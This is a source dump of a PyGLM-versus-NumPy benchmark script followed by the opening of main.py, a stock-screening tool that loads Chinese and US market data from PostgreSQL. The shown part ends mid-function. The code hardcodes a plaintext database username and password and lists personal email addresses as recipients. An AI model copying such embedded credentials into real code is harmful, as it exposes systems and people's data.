print("PyGLM instruction:\n\t{}.{}({})\n".format(glm_func.__module__, glm_func.__name__, ", ".join([arg_to_string(x) for x in glm_args])))
print("NumPy instruction:\n\t{}.{}({})\n".format(numpy_func.__module__, numpy_func.__name__, ", ".join([arg_to_string(x) for x in numpy_args])))
print("Running for {} seconds...".format(test_duration))
measure_function_glm(glm_func, *glm_args)
measure_function_numpy(numpy_func, *numpy_args)
#Thread(target=measure_function_glm, args=[glm_func] + list(glm_args)).start()
#Thread(target=measure_function_numpy, args=[numpy_func] + list(numpy_args)).start()
#print_percentage()
print("\nTimes ran:\n\tPyGLM: {:.2f}s\n\tNumPy: {:.2f}s\n".format(glm_counter, numpy_counter))
print("{}.\n".format(get_evaluation_string(glm_counter, numpy_counter)))
results.append((description, glm_counter, numpy_counter))
def test_operation(description, operation, format_, glm_args, numpy_args):
print("-"*80)
print("Comparing {}.\n".format(description))
print("PyGLM instruction:\n\t{}\n".format(format_.format(*[arg_to_string(x) for x in glm_args])))
print("NumPy instruction:\n\t{}\n".format(format_.format(*[arg_to_string(x) for x in numpy_args])))
print("Running for {} second(s)...".format(test_duration))
measure_function_glm(operation, *glm_args)
measure_function_numpy(operation, *numpy_args)
#Thread(target=measure_function_glm, args=[operation] + list(glm_args)).start()
#Thread(target=measure_function_numpy, args=[operation] + list(numpy_args)).start()
#print_percentage()
print("\nTimes ran:\n\tPyGLM: {:.2f}s\n\tNumPy: {:.2f}s\n".format(glm_counter, numpy_counter))
print("{}.\n".format(get_evaluation_string(glm_counter, numpy_counter)))
results.append((description, glm_counter, numpy_counter))
def print_table_row(descr, glm_time, numpy_time, ratio):
while len(descr) > 38:
last_space = descr[:38].rfind(" ")
print(("| {} | " + " " * 10 + " | " + " " * 10 + " | " + " " * 9 + " |").format(descr[:last_space] + (38 - last_space) * " "))
descr = descr[last_space + 1:]
print("| {} | {} | {} | {} |".format(descr + (38 - len(descr)) * " ", glm_time, numpy_time, ratio))
def format_large_num(num):
log10 = int(math.log10(num))
if log10 <= 5:
out = "{:,} ".format(num)
elif log10 <= 8:
out = "{:,}M".format(num // 1000).replace(",", ".")
else:
out = "{:,}B".format(num // 1000000).replace(",", ".")
return " " * (9 - len(out)) + out
def print_results():
for description, glm_counter, numpy_counter in results:
print_table_row(description, "{} ".format(format_large_num(glm_counter)), "{} ".format(format_large_num(numpy_counter)), "{: 8.2f}x".format(glm_counter / numpy_counter))
print("+----------------------------------------+------------+------------+-----------+")
import glm, numpy
"""
print("-"*80)
print("Comparing import speed.")
start = time.time()
import glm
glm_time = time.time() - start
start = time.time()
import numpy
numpy_time = time.time() - start
results.append(("import", numpy_time, glm_time))
print("\nTime taken:\n\tPyGLM: {:.2f}s\n\tNumPy: {:.2f}s\n".format(glm_time, numpy_time))
print("{}.\n".format(get_evaluation_string(numpy_time, glm_time)))
"""
test_func("3 component vector creation", glm.vec3, [0], numpy.zeros, [(3,), numpy.float32])
test_func("3 component vector creation with custom components", glm.vec3, [1, 2, 3], numpy.array, [(1, 2, 3), numpy.float32])
test_func("dot product", glm.dot, [glm.vec3(), glm.vec3()], numpy.dot, [numpy.zeros((3,)), numpy.zeros((3,))])
repetitions = 100_000
test_func("cross product", glm.cross, [glm.vec3(1), glm.vec3(1,2,3)], numpy.cross, [numpy.array((1,1,1), numpy.float32), numpy.array((1,2,3), numpy.float32)])
test_func("L2-Norm of 3 component vector", glm.l2Norm, [glm.vec3(1,2,3)], numpy.linalg.norm, [numpy.array((1,2,3), numpy.float32)])
repetitions = 1_000_000
test_func("4x4 matrix creation", glm.mat4, [0], numpy.zeros, [(4,4), numpy.float32])
test_func("4x4 identity matrix creation", glm.identity, [glm.mat4], numpy.identity, [4, numpy.float32])
test_func("4x4 matrix transposition", glm.transpose, [glm.mat4()], numpy.transpose, [numpy.identity(4, numpy.float32)])
repetitions = 100_000
test_func("4x4 matrix multiplicative inverse", glm.inverse, [glm.mat4()], numpy.linalg.inv, [numpy.identity(4, numpy.float32)])
repetitions = 1_000_000
test_operation("3 component vector addition", lambda x, y: (x+y), "{} + {}", [glm.vec3(), glm.vec3()], [numpy.zeros(3, numpy.float32), numpy.zeros(3, numpy.float32)])
test_operation("4x4 matrix multiplication", lambda x, y: (x*y), "{} * {}", [glm.mat4(), glm.mat4()], [numpy.identity(4, numpy.float32), numpy.identity(4, numpy.float32)])
test_operation("4x4 matrix - 4 component vector multiplication", lambda x, y: (x*y), "{} * {}", [glm.mat4(), glm.vec4()], [numpy.identity(4, numpy.float32), numpy.zeros(4, numpy.float32)])
print("#" *80)
print("RESULTS:\n")
print("+----------------------------------------+------------+------------+-----------+")
print("| Description | PyGLM runs | NumPy runs | ratio |")
print("+----------------------------------------+------------+------------+-----------+")
print_results()
|
main.py
|
import pandas as pd
import akshare as ak
import yfinance as yf
import psycopg2
from sqlalchemy import create_engine
from numpy import (float64, nan)
from abc import (abstractmethod)
import pathlib
import os
import time
from EmQuantAPI import *
import traceback
import datetime
import enum
import logging as log
import sys
import threading
from queue import Queue
from email.message import EmailMessage
from email.mime.text import MIMEText
import smtplib
from MyTT import *
import efinance as ef
from tqdm import tqdm
# Align column names with the data for display
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
# Show all columns
pd.set_option('display.max_columns', None)
# Show all rows
pd.set_option('display.max_rows', None)
log.basicConfig(level=log.DEBUG,
format='[%(asctime)s %(filename)s [line:%(lineno)d]] %(levelname)s %(message)s',
datefmt='%d %b %Y %H:%M:%S',
filename='myquant.log',
filemode='a+')
logger = log.getLogger("MyQuant")
# logger.addHandler(log.StreamHandler(sys.stdout))
def append_value(dict_obj, key, value_inner):
# Check if key exist in dict or not
if key in dict_obj:
# Key exist in dict.
# Check if type of value of key is list or not
if not isinstance(dict_obj[key], list):
# If type is not list then make it list
dict_obj[key] = [dict_obj[key]]
# Append the value in list
dict_obj[key].append(value_inner)
else:
# As key is not in dict,
# so, add key-value pair
dict_obj[key] = value_inner
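# e.g. d = {}; append_value(d, 'k', 1); append_value(d, 'k', 2)  =>  d == {'k': [1, 2]}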
def time_measure(func):
def inner(*args, **kwargs):
starttime = time.perf_counter()
ret = func(*args, **kwargs)
endtime = time.perf_counter()
logger.debug("{} took {}s".format(str(func), endtime - starttime))
return ret
return inner
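# Illustrative use of the decorator (hypothetical function name):
#   @time_measure
#   def fetch_quotes():
#       ...
#   fetch_quotes()  # logs "<function fetch_quotes at 0x...> took <elapsed>s" at DEBUG level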
class CountryCode(enum.Enum):
CHINA = 'cn'
US = 'us'
NONE = 'none'
exchanges = {"中小企业板": 'sz',
"创业板": 'sz',
"主板": 'sz',
"科创板": 'sh',
"主板A股": 'sh'}
class DataContext:
country = CountryCode.NONE
limitfordatafetched = 0
limitfordatafetched_30 = 0
limitfordatafetched_60 = 0
limitfordatafetched_240 = 0
markets = []
marketopentime: datetime.time = None
marketclosetime: datetime.time = None
marketbreakstarttime: datetime.time = None
marketbreakstoptime: datetime.time = None
dir_name = ''
invalid_stock_codes = set()
sendemial_interval = 6
strategy1 = 'strategy1'
strategy2 = 'strategy2'
strategy3 = 'strategy3'
strategy4 = 'strategy4'
strategy5 = 'strategy5'
strategy6 = 'strategy6'
strategy1_2 = 'strategy1and2'
strategy1_4 = 'strategy1and4'
strategy100 = 'strategy100'
strategy101 = 'strategy101'
strategy102 = 'strategy102'
strategy103 = 'strategy103'
strategy104 = 'strategy104'
strategy7 = 'strategy7'
strategy8 = 'strategy8'
strategy9 = 'strategy9'
strategy10 = 'strategy10'
strategy11 = 'strategy11'
strategy12 = 'strategy12'
strategy13 = 'strategy13'
strategy14 = 'strategy14'
email_recipient = 'wsx_dna@sina.com'
email_other1_recipient = 'stocash2021@163.com'
email_other2_recipient = 'Li_hewei@126.com'
code_spotlighted = [7171, 2901, 300571, 2634, 300771, 603871, 603165, 603755, 2950, 688178,
603506, 603757, 537, 600167, 300765, 603327, 603360, 300738, 688026, 300800,
600452, 603277, 300497, 603380, 603848, 600477, 603697, 2768, 300701, 2973,
603639, 603357, 300640, 603053, 300246, 603203, 603040, 603657, 603530, 603458,
300602, 603466, 2653, 2923, 300559, 603867, 603326, 2892, 2853, 2287,
688289, 955, 2030, 688298, 688317, 603301, 2131, 688399, 576, 600685,
300030, 2382, 600683, 603985, 300246, 600026, 2838, 300206, 2567, 2310,
600836, 600975, 603079, 2026, 2585, 2432, 2726, 2181, 2980, 300658,
2950, 2157, 585, 600133, 603238, 2605, 868, 600011, 600527, 603758,
2487, 601991, 300443, 2223, 300210, 27, 628, 600739, 532, 601377,
300690, 421, 690, 987, 600961, 600198, 605358, 600460, 2151, 688126,
300236, 688258, 603690, 300077, 300139, 688981, 300671, 688233, 600206, 688595,
300706, 300333, 603005, 2371, 300493, 600667, 300661, 688123, 300548, 600360,
603806, 600517, 875, 601908, 601222, 601012, 601615, 603218, 27, 600008,
688599, 300185, 300850, 400, 300815, 625, 2266, 601877, 881]
@classmethod
def initklz(cls, country_param: CountryCode):
DataContext.country = country_param
if DataContext.iscountryChina():
DataContext.limitfordatafetched = 160
DataContext.limitfordatafetched_30 = 160
DataContext.limitfordatafetched_60 = 320
DataContext.limitfordatafetched_240 = 128
DataContext.markets = ["创业板", "中小企业板", "主板A股", "主板", "科创板"]
DataContext.marketopentime = datetime.time(hour=9, minute=30)
DataContext.marketclosetime = datetime.time(hour=15)
DataContext.marketbreakstarttime = datetime.time(hour=11, minute=30)
DataContext.marketbreakstoptime = datetime.time(hour=13)
DataContext.dir_name = os.path.join(r'./result_strategy/cn', datetime.datetime.today().strftime('%Y%m%d'))
elif DataContext.iscountryUS():
DataContext.limitfordatafetched = 260
DataContext.limitfordatafetched_30 = 195
DataContext.markets = ["NASDAQ", "NYSE", "AMEX"]
DataContext.marketopentime = datetime.time(hour=9, minute=30)
DataContext.marketclosetime = datetime.time(hour=16)
DataContext.dir_name = os.path.join(r'./result_strategy/us', datetime.datetime.today().strftime('%Y%m%d'))
DataContext.invalid_stock_codes = {"AMCI.O", "BDGE.O", "BEAT.O", "FSDC.O", "GTLS.O", "HFEN.O", "INAQ.O",
"NOVS.O", "PEIX.O", "YRCW.O", "CCC.N", "CTRA.N", "PCPL.N", "SALT.N",
"CRMD.A", "CTO.A", "MCAC.O", "PANA.N", "OBLG.A", "LGVW.N", "XAN_C.N",
"XAN.N", "WYND.N", "CVLB.O"}
@classmethod
def iscountryChina(cls):
return DataContext.country == CountryCode.CHINA
@classmethod
def iscountryUS(cls):
return DataContext.country == CountryCode.US
def __init__(self):
self.start_i = -1
self.end_i = -1
self.cross_sma_period = 70
self.rsv_period = 9
self.k_period = 3
self.d_period = 3
self.obv_period = 70
self.obv_a_period = 30
self.queue = Queue()
if not os.path.isdir(DataContext.dir_name):
os.mkdir(DataContext.dir_name)
if DataContext.iscountryChina():
self.greater_than_sma_period = 80
# 15mins
self.China_small_15 = StockData('small')
self.China_startup_15 = StockData('startup')
self.China_tech_startup_15 = StockData('tech_startup')
self.China_sh_a_15 = StockData('sh_a')
self.China_sz_a_15 = StockData('sz_a')
# 30mins
self.China_small_30 = StockData('small')
self.China_startup_30 = StockData('startup')
self.China_tech_startup_30 = StockData('tech_startup')
self.China_sh_a_30 = StockData('sh_a')
self.China_sz_a_30 = StockData('sz_a')
# 60mins
self.China_small_60 = StockData('small')
self.China_startup_60 = StockData('startup')
self.China_tech_startup_60 = StockData('tech_startup')
self.China_sh_a_60 = StockData('sh_a')
self.China_sz_a_60 = StockData('sz_a')
# 240mins
self.China_small_240 = StockData('small')
self.China_startup_240 = StockData('startup')
self.China_tech_startup_240 = StockData('tech_startup')
self.China_sh_a_240 = StockData('sh_a')
self.China_sz_a_240 = StockData('sz_a')
# symbol lists
self.symbols_l_tech_startup = []
self.symbols_l_startup = []
self.symbols_l_small = []
self.symbols_l_sh_a = []
self.symbols_l_sz_a = []
# symbol.exchange lists
self.symbols_exchange_l_tech_startup = []
self.symbols_exchange_l_startup = []
self.symbols_exchange_l_small = []
self.symbols_exchange_l_sh_a = []
self.symbols_exchange_l_sz_a = []
self.preparedata("科创板")
self.preparedata("中小企业板")
self.preparedata("创业板")
self.preparedata("主板A股")
self.preparedata("主板")
self.data15mins = {stock_group["科创板"]: self.China_tech_startup_15,
stock_group["中小企业板"]: self.China_small_15,
stock_group["创业板"]: self.China_startup_15,
stock_group["主板A股"]: self.China_sh_a_15,
stock_group["主板"]: self.China_sz_a_15}
self.data30mins = {stock_group["科创板"]: self.China_tech_startup_30,
stock_group["中小企业板"]: self.China_small_30,
stock_group["创业板"]: self.China_startup_30,
stock_group["主板A股"]: self.China_sh_a_30,
stock_group["主板"]: self.China_sz_a_30}
self.data60mins = {stock_group["科创板"]: self.China_tech_startup_60,
stock_group["中小企业板"]: self.China_small_60,
stock_group["创业板"]: self.China_startup_60,
stock_group["主板A股"]: self.China_sh_a_60,
stock_group["主板"]: self.China_sz_a_60}
self.data240mins = {stock_group["科创板"]: self.China_tech_startup_240,
stock_group["中小企业板"]: self.China_small_240,
stock_group["创业板"]: self.China_startup_240,
stock_group["主板A股"]: self.China_sh_a_240,
stock_group["主板"]: self.China_sz_a_240}
self.symbols = {stock_group["科创板"]: self.symbols_l_tech_startup,
stock_group["中小企业板"]: self.symbols_l_small,
stock_group["创业板"]: self.symbols_l_startup,
stock_group["主板A股"]: self.symbols_l_sh_a,
stock_group["主板"]: self.symbols_l_sz_a}
self.symbols_exchange = {stock_group["科创板"]: self.symbols_exchange_l_tech_startup,
stock_group["中小企业板"]: self.symbols_exchange_l_small,
stock_group["创业板"]: self.symbols_exchange_l_startup,
stock_group["主板A股"]: self.symbols_exchange_l_sh_a,
stock_group["主板"]: self.symbols_exchange_l_sz_a}
elif DataContext.iscountryUS():
self.greater_than_sma_period = 130
# 15mins
self.US_nasdaq_15 = StockData(stock_group["NASDAQ"])
self.US_nyse_15 = StockData(stock_group['NYSE'])
self.US_amex_15 = StockData(stock_group['AMEX'])
# 30mins
self.US_nasdaq_30 = StockData(stock_group["NASDAQ"])
self.US_nyse_30 = StockData(stock_group['NYSE'])
self.US_amex_30 = StockData(stock_group['AMEX'])
# symbol lists
self.symbols_l_nasdaq = []
self.symbols_l_nyse = []
self.symbols_l_amex = []
# symbol.exchange lists
self.symbols_exchange_l_nasdaq = []
self.symbols_exchange_l_nyse = []
self.symbols_exchange_l_amex = []
self.preparedata("NASDAQ")
self.preparedata("NYSE")
self.preparedata("AMEX")
self.data15mins = {stock_group["NASDAQ"]: self.US_nasdaq_15,
stock_group["NYSE"]: self.US_nyse_15,
stock_group["AMEX"]: self.US_amex_15}
self.data30mins = {stock_group["NASDAQ"]: self.US_nasdaq_30,
stock_group["NYSE"]: self.US_nyse_30,
stock_group["AMEX"]: self.US_amex_30}
self.symbols = {stock_group["NASDAQ"]: self.symbols_l_nasdaq,
stock_group["NYSE"]: self.symbols_l_nyse,
stock_group["AMEX"]: self.symbols_l_amex}
self.symbols_exchange = {stock_group["NASDAQ"]: self.symbols_exchange_l_nasdaq,
stock_group["NYSE"]: self.symbols_exchange_l_nyse,
stock_group["AMEX"]: self.symbols_exchange_l_amex}
self.sendemailtime: datetime.datetime = None
self.totalresult = {DataContext.strategy1_4: {}, DataContext.strategy1_2: {},
DataContext.strategy5: {}, DataContext.strategy100: {},
DataContext.strategy4: {}, DataContext.strategy1: {},
DataContext.strategy2: {}, DataContext.strategy3: {},
DataContext.strategy101: {}, DataContext.strategy102: {},
DataContext.strategy6: {}, DataContext.strategy7: {},
DataContext.strategy103: {}, DataContext.strategy8: {},
DataContext.strategy104: {}, DataContext.strategy9: {},
DataContext.strategy10: {}, DataContext.strategy11: {},
DataContext.strategy12: {}, DataContext.strategy13: {},
DataContext.strategy14: {}}
self.sectors = {}
logger.debug("Initialization of context is done.")
def preparedata(self, indicator: str):
logger.debug("--- Start to prepare data --- " + indicator)
tablename_prefixes = ["", "", "", ""]
def gentablenameprefix(prefixes: list):
if DataContext.iscountryChina():
countrycode = 'china_'
else:
countrycode = 'us_'
if indicator == "科创板":
prefixes[0] = 'china_tbl_'
else:
prefixes[0] = countrycode + stock_group[indicator] + '_tbl_'
prefixes[1] = countrycode + stock_group[indicator] + '_tbl_30_'
prefixes[2] = countrycode + stock_group[indicator] + '_tbl_60_'
prefixes[3] = countrycode + stock_group[indicator] + '_tbl_240_'
if indicator in {"中小企业板", "创业板", "主板"}:
header = "公司代码"
elif indicator in {"科创板", "主板A股"}:
header = 'SECURITY_CODE_A'
elif indicator in {"NASDAQ", "NYSE", "AMEX"}:
header = 'SECURITY_CODE_A'
        exchange = exchanges.get(indicator)  # only defined for China boards; None for US markets, where it is unused
gentablenameprefix(tablename_prefixes)
tmp_symbol_l = []
tmp_symbol_exchange_l = []
tmp_data = StockData()
tmp_data.sector = stock_group[indicator]
tmp_data_30 = StockData()
tmp_data_30.sector = stock_group[indicator]
tmp_data_60 = StockData()
tmp_data_60.sector = stock_group[indicator]
tmp_data_240 = StockData()
tmp_data_240.sector = stock_group[indicator]
def getdatafromdatabase(tablename: str, limits: int):
sql_statement = "select * from \"{}\" order by crt_time desc limit {};".format(tablename, limits)
datafromdatabase = pd.read_sql_query(sql_statement, engine, index_col='crt_time')
datafromdatabase.sort_index(inplace=True)
return datafromdatabase
symbol_path = symbol_paths[stock_group[indicator]]
if pathlib.Path(symbol_path).is_file():
symbolsfromcsv = pd.read_csv(symbol_path)
if DataContext.iscountryChina():
tmp_symbol_l = symbolsfromcsv[header].astype(str).str.zfill(6).tolist()
elif DataContext.iscountryUS():
tmp_symbol_l = symbolsfromcsv[header].astype(str).tolist()
for symbol in tmp_symbol_l:
if DataContext.iscountryChina():
internal_symbol = ".".join([symbol, exchange])
tmp_symbol_exchange_l.append(internal_symbol)
elif DataContext.iscountryUS():
symbol_exchange_l = symbol.split(".")
if len(symbol_exchange_l) > 1:
symbol = symbol_exchange_l[0]
tmp_symbol_exchange_l.append(symbol)
else:
logger.error('%s is invalid', symbol)
continue
table_name = tablename_prefixes[0] + symbol
tmp_data.update(symbol, getdatafromdatabase(table_name, DataContext.limitfordatafetched))
table_name_30 = tablename_prefixes[1] + symbol
tmp_data_30.update(symbol, getdatafromdatabase(table_name_30, DataContext.limitfordatafetched_30))
if DataContext.iscountryChina():
table_name_60 = tablename_prefixes[2] + symbol
tmp_data_60.update(symbol, getdatafromdatabase(table_name_60, DataContext.limitfordatafetched_60))
table_name_240 = tablename_prefixes[3] + symbol
tmp_data_240.update(symbol, getdatafromdatabase(table_name_240, DataContext.limitfordatafetched_240))
else:
logger.error('%s does not exist', (symbol_paths[stock_group[indicator]]))
exit()
if DataContext.iscountryChina():
if indicator == "中小企业板":
self.symbols_l_small = tmp_symbol_l
self.symbols_exchange_l_small = tmp_symbol_exchange_l
self.China_small_15 = tmp_data
self.China_small_30 = tmp_data_30
self.China_small_60 = tmp_data_60
self.China_small_240 = tmp_data_240
elif indicator == "创业板":
self.symbols_l_startup = tmp_symbol_l
self.symbols_exchange_l_startup = tmp_symbol_exchange_l
self.China_startup_15 = tmp_data
self.China_startup_30 = tmp_data_30
self.China_startup_60 = tmp_data_60
self.China_startup_240 = tmp_data_240
elif indicator == "科创板":
self.symbols_l_tech_startup = tmp_symbol_l
self.symbols_exchange_l_tech_startup = tmp_symbol_exchange_l
self.China_tech_startup_15 = tmp_data
self.China_tech_startup_30 = tmp_data_30
self.China_tech_startup_60 = tmp_data_60
self.China_tech_startup_240 = tmp_data_240
elif indicator == "主板A股":
self.symbols_l_sh_a = tmp_symbol_l
self.symbols_exchange_l_sh_a = tmp_symbol_exchange_l
self.China_sh_a_15 = tmp_data
self.China_sh_a_30 = tmp_data_30
self.China_sh_a_60 = tmp_data_60
self.China_sh_a_240 = tmp_data_240
elif indicator == "主板":
self.symbols_l_sz_a = tmp_symbol_l
self.symbols_exchange_l_sz_a = tmp_symbol_exchange_l
self.China_sz_a_15 = tmp_data
self.China_sz_a_30 = tmp_data_30
self.China_sz_a_60 = tmp_data_60
self.China_sz_a_240 = tmp_data_240
elif DataContext.iscountryUS():
if indicator == "NASDAQ":
self.symbols_l_nasdaq = tmp_symbol_exchange_l
self.symbols_exchange_l_nasdaq = tmp_symbol_l
self.US_nasdaq_15 = tmp_data
self.US_nasdaq_30 = tmp_data_30
elif indicator == "NYSE":
self.symbols_l_nyse = tmp_symbol_exchange_l
self.symbols_exchange_l_nyse = tmp_symbol_l
self.US_nyse_15 = tmp_data
self.US_nyse_30 = tmp_data_30
elif indicator == "AMEX":
self.symbols_l_amex = tmp_symbol_exchange_l
self.symbols_exchange_l_amex = tmp_symbol_l
self.US_amex_15 = tmp_data
self.US_amex_30 = tmp_data_30
logger.debug("--- It is done with preparation of data --- " + indicator)
@time_measure
def csqsnapshot_t(codes, indicators, options=""):
return c.csqsnapshot(codes, indicators, options)
connections = threading.local()
stock_group = {"科创板": 'tech_startup',
"中小企业板": 'small',
"创业板": 'startup',
"主板A股": 'sh_a',
"主板": 'sz_a',
"NASDAQ": 'nasdaq',
"NYSE": 'nyse',
"AMEX": 'amex'}
columns = ['gid', 'open', 'close', 'high', 'low', 'volume', 'time', 'isGreater']
root_path = r'/Users/shicaidonghua/Documents/stocks/quant_akshare/'
symbol_paths = {'small': root_path + 'small_symbols.csv',
'startup': root_path + 'startup_symbols.csv',
'tech_startup': root_path + 'tech_startup_symbols.csv',
'sh_a': root_path + 'sh_a_symbols.csv',
'sz_a': root_path + 'sz_a_symbols.csv',
'nasdaq': root_path + 'nasdaq_symbols.csv',
'nyse': root_path + 'nyse_symbols.csv',
'amex': root_path + 'amex_symbols.csv'}
time_windows_15 = [0 for i in range(100)]  # sized at 100 so the windows can also be indexed in after-market tests
time_windows_30 = [0 for i in range(100)]  # sized at 100 so the windows can also be indexed in after-market tests
time_windows_60 = [0 for i in range(100)]  # sized at 100 so the windows can also be indexed in after-market tests
sectors_CN = {'000001': "优选股关注",
'007180': "券商概念",
'007224': "大飞机",
'007315': "半导体",
'007205': "国产芯片",
'007039': "生物疫苗",
'007001': "军工",
'007139': "医疗器械",
'007146': "病毒防治",
'007147': "独家药品",
'007162': "基因测序",
'007167': "免疫治疗",
'007188': "健康中国",
'007195': "人工智能",
'007200': "区块链",
'007206': "新能源车",
'007212': "生物识别",
'007218': "精准医疗",
'007220': "军民融合",
'007243': "互联医疗",
'007246': "体外诊断",
'007284': "数字货币",
'007332': "长寿药",
'007336': "疫苗冷链",
'007339': "肝素概念",
'014010018003': "生物医药",
'004012003001': "太阳能",
'015011003003': "光伏",
'007371': "低碳冶金",
'018001001002001': "新能源设备与服务",
'007068': "太阳能",
'007005': "节能环保",
'007152': "燃料电池",
'007307': "HIT电池",
'007370': "光伏建筑一体化",
'007369': "碳化硅",
'007003': "煤化工",
'007004': "新能源",
'007007': "AB股",
'007008': "AH股",
'007009': "HS300_",
'007010': "次新股",
'007013': "中字头",
'007014': "创投",
'007017': "网络游戏",
'007019': "ST股",
'007020': "化工原料",
'007022': "参股券商",
'007024': "稀缺资源",
'007025': "社保重仓",
'007028': "新材料",
'007029': "参股期货",
'007030': "参股银行",
'007032': "转债标的",
'007033': "成渝特区",
'007034': "QFII重仓",
'007035': "基金重仓",
'007038': "黄金概念",
'007040': "深圳特区",
'007043': "机构重仓",
'007045': "物联网",
'007046': "移动支付",
'007048': "油价相关",
'007049': "滨海新区",
'007050':"股权激励",
'007051': "深成500",
'007053': "预亏预减",
'007054': "预盈预增",
'007057': "锂电池",
'007058': "核能核电",
'007059': "稀土永磁",
'007060': "云计算",
'007061': "LED",
'007062': "智能电网",
'007072': "铁路基建",
'007074': "长江三角",
'007075': "风能",
'007076': "融资融券",
'007077': "水利建设",
'007079': "新三板",
'007080': "海工装备",
'007082': "页岩气",
'007083': "参股保险",
'007085': "油气设服",
'007089': "央视50_",
'007090': "上证50_",
'007091': "上证180_",
'007093': "食品安全",
'007094': "中药",
'007096': "石墨烯",
'007098': "3D打印",
'007099': "地热能",
'007100': "海洋经济",
'007102': "通用航空",
'007104': "智慧城市",
'007105': "北斗导航",
'007108': "土地流转",
'007109': "送转预期",
'007110': "大数据",
'007111': "中超概念",
'007112': "B股",
'007113': "互联金融",
'007114': "创业成份",
'007116': "智能机器",
'007117': "智能穿戴",
'007118': "手游概念",
'007119': "上海自贸",
'007120': "特斯拉",
'007122': "养老概念",
'007124': "网络安全",
'007125': "智能电视",
'007131': "在线教育",
'007133': "二胎概念",
'007137': "电商概念",
'007136': "苹果概念",
'007138': "国家安防",
'007140': "生态农业",
'007142': "彩票概念",
'007143': "沪企改革",
'007145': "蓝宝石",
'007148': "粤港自贸",
'007149': "超导概念",
'007150': "智能家居",
'007153': "国企改革",
'007154': "京津冀",
'007155': "举牌",
'007159': "阿里概念",
'007160': "氟化工",
'007161': "在线旅游",
'007164': "小金属",
'007165': "国产软件",
'007166': "IPO受益",
'007168': "全息技术",
'007169': "充电桩",
'007170': "中证500",
'007172': "超级电容",
'007173': "无人机",
'007174': "上证380",
'007175': "人脑工程",
'007176': "沪股通",
'007177': "体育产业",
'007178': "赛马概念",
'007179': "量子通信",
'007181': "一带一路",
'007182': "2025规划",
'007183': "5G概念",
'007184': "航母概念",
'007186': "北京冬奥",
'007187': "证金持股",
'007190': "PPP模式",
'007191': "虚拟现实",
'007192': "高送转",
'007193': "海绵城市",
'007196': "增强现实",
'007197': "无人驾驶",
'007198': "工业4.0",
'007199': "壳资源",
'007201': "OLED",
'007202': "单抗概念",
'007203': "3D玻璃",
'007204': "猪肉概念",
'007207': "车联网",
'007209': "网红直播",
'007210': "草甘膦",
'007211': "无线充电",
'007213': "债转股",
'007214': "快递概念",
'007215': "股权转让",
'007216': "深股通",
'007217': "钛白粉",
'007219': "共享经济",
'007221': "超级品牌",
'007222': "贬值受益",
'007223': "雄安新区",
'007225': "昨日涨停",
'007226': "昨日连板",
'007227': "昨日触板",
'007228': "可燃冰",
'007230': "MSCI中国",
'007231': "创业板综",
'007232': "深证100R",
'007233': "租售同权",
'007234': "养老金",
'007236': "新零售",
'007237': "万达概念",
'007238': "工业互联",
'007239': "小米概念",
'007240': "乡村振兴",
'007241': "独角兽",
'007244': "东北振兴",
'007245': "知识产权",
'007247': "富士康",
'007248': "天然气",
'007249': "百度概念",
'007251': "影视概念",
'007253': "京东金融",
'007254': "进口博览",
'007255': "纾困概念",
'007256': "冷链物流",
'007257': "电子竞技",
'007258': "华为概念",
'007259': "纳米银",
'007260': "工业大麻",
'007263': "超清视频",
'007264': "边缘计算",
'007265': "数字孪生",
'007266': "超级真菌",
'007268': "氢能源",
'007269': "电子烟",
'007270': "人造肉",
'007271': "富时罗素",
'007272': "GDR",
'007275': "青蒿素",
'007276': "垃圾分类",
'007278': "ETC",
'007280': "PCB",
'007281': "分拆预期",
'007282': "标准普尔",
'007283': "UWB概念",
'007285': "光刻胶",
'007286': "VPN",
'007287': "智慧政务",
'007288': "鸡肉概念",
'007289': "农业种植",
'007290': "医疗美容",
'007291': "MLCC",
'007292': "乳业",
'007293': "无线耳机",
'007294': "阿兹海默",
'007295': "维生素",
'007296': "白酒",
'007297': "IPv6",
'007298': "胎压监测",
'007299': "CRO",
'007300': "3D摄像头",
'007301': "MiniLED",
'007302': "云游戏",
'007303': "广电",
'007304': "传感器",
'007305': "流感",
'007306': "转基因",
'007308': "降解塑料",
'007309': "口罩",
'007310': "远程办公",
'007311': "消毒剂",
'007312': "医废处理",
'007313': "WiFi",
'007314': "氮化镓",
'007316': "特高压",
'007317': "RCS概念",
'007318': "天基互联",
'007319': "数据中心",
'007320': "字节概念",
'007321': "地摊经济",
'007322': "三板精选",
'007323': "湖北自贸",
'007324': "免税概念",
'007325': "抖音小店",
'007326': "地塞米松",
'007328': "尾气治理",
'007329': "退税商店",
'007330': "蝗虫防治",
'007331': "中芯概念",
'007333': "蚂蚁概念",
'007334': "代糖概念",
'007335': "辅助生殖",
'007337': "商汤概念",
'007338': "汽车拆解",
'007340': "装配建筑",
'007341': "EDA概念",
'007342': "屏下摄像",
'007343': "MicroLED",
'007344': "氦气概念",
'007345': "刀片电池",
'007346': "第三代半导体",
'007347': "鸿蒙概念",
'007348': "盲盒经济",
'007349': "C2M概念",
'007350': "eSIM",
'007351': "拼多多概念",
'007352': "虚拟电厂",
'007353': "数字阅读",
'007354': "有机硅",
'007355': "RCEP概念",
'007356': "航天概念",
'007357': "6G概念",
'007358': "社区团购",
'007359': "碳交易",
'007360': "水产养殖",
'007361': "固态电池",
'007362': "汽车芯片",
'007363': "注册制次新股",
'007364': "快手概念",
'007365': "注射器概念",
'007366': "化妆品概念",
'007367': "磁悬浮概念",
'007368': "被动元件",
'007372': "工业气体",
              # gain/loss and money-flow values are unavailable for the sectors below
'007373': "电子车牌",
'007374': "核污染防治",
'007375': "华为汽车",
'007376': "换电概念",
'007377': "CAR - T细胞疗法",
'073259': "碳交易"}
sectors_US = {'000001': "优选股关注",
'201001': "中概股"}
# pass echo=True to create_engine to log each SQL statement issued in queries
engine = create_engine("postgresql+psycopg2://Raymond:123123@localhost:5432/Raymond", encoding='utf-8')
class DataSource(enum.Enum):
EAST_MONEY = 0
AK_SHARE = 1
YAHOO = 2
SNAPSHOT = 3
EFINANCE = 4
def getdbconn():
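    # one psycopg2 connection per thread: created lazily on first use and
    # cached on the thread-local `connections` object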
if 'connection' not in connections.__dict__:
connections.connection = psycopg2.connect(
user="Raymond",
password="123123",
host="127.0.0.1",
port="5432",
database="Raymond")
logger.info('Connect to Raymond\'s database - {}\n current connection is {}\n thread ident is {} and native thread id is {}\n'.
format(connections.connection.get_dsn_parameters(), connections.connection, threading.get_ident(), threading.get_native_id()))
return connections.connection
def createtable(symbols: list, exchange: str, period: int):
conn = getdbconn()
csr = getdbconn().cursor()
stock_name_array = map(str, symbols)
